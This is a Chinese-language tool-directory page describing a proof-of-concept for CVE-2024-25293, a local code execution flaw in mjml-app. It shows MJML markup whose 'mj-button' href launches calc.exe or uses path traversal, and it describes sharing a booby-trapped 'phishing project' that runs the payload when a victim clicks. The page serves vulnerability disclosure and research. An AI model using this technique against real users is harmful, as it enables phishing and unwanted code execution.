Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-25293 — mjml-app v3.0.4 & 3.1.0-beta RCE 漏洞利用 | Kitploit
工具/GitHubGitHub/eqstlab/cve-2024-25293
钓鱼工具Payload生成漏洞分析漏洞利用Web应用程序漏洞利用错误配置
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 & 3.1.0-beta RCE 漏洞利用

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MJML 本地代码执行 PoC

CVE-2024-25293 漏洞的概念验证(PoC)。

mjml-app v3.0.4 和 3.1.0-beta 被发现存在远程代码执行(RCE)漏洞。 此仓库中包含一个易受攻击的示例应用程序及其概念验证(POC)利用程序。

作为 PoC,其中有一个用于自动化该过程的 Python 文件。

1.漏洞概述:

  • 漏洞主题:本地代码执行
  • 漏洞版本:mjml-app 3.0.4-win 和 mjml-app 3.1.0-beta
  • 攻击类型:远程代码执行
  • 攻击组件:在受影响源代码文件中的 'mj-button' 标签内,'href' 属性可导致本地代码执行。
  • 保留 CVE 编号:CVE-2024-25293

2. 漏洞成因:

  • mjml-app 3.0.4-win 和 mjml-app 3.1.0 beta 在 'mj-button' 标签中存在安全配置错误,可能导致任意代码执行。
  • 漏洞利用说明
    • 通过 mjml 应用中的事件标签运行本地文件会带来安全威胁。此外,还可结合应用内的路径遍历(Path Traversal)执行代码,因此需要修补。 image

概念验证(POC)

步骤 1)攻击者创建一个带有 'href' 标签的 'mj-button',并且

  • 情况 1)结合路径遍历的代码执行(notepad.exe)
  • 情况 2)代码执行(calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

步骤 2)攻击者使用以下代码创建主钓鱼项目。

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

步骤 3)受害者打开共享项目并点击按钮,触发载荷的执行(例如 calc、notepad) mjml3


3. 附加信息

在应用内通过 href 标签运行 exe 文件存在风险,结合路径遍历运行文件更是一个安全隐患。这使得攻击者可以创建并部署钓鱼项目来执行本地文件。因此,必须修改此功能以防止此类执行。

下载工具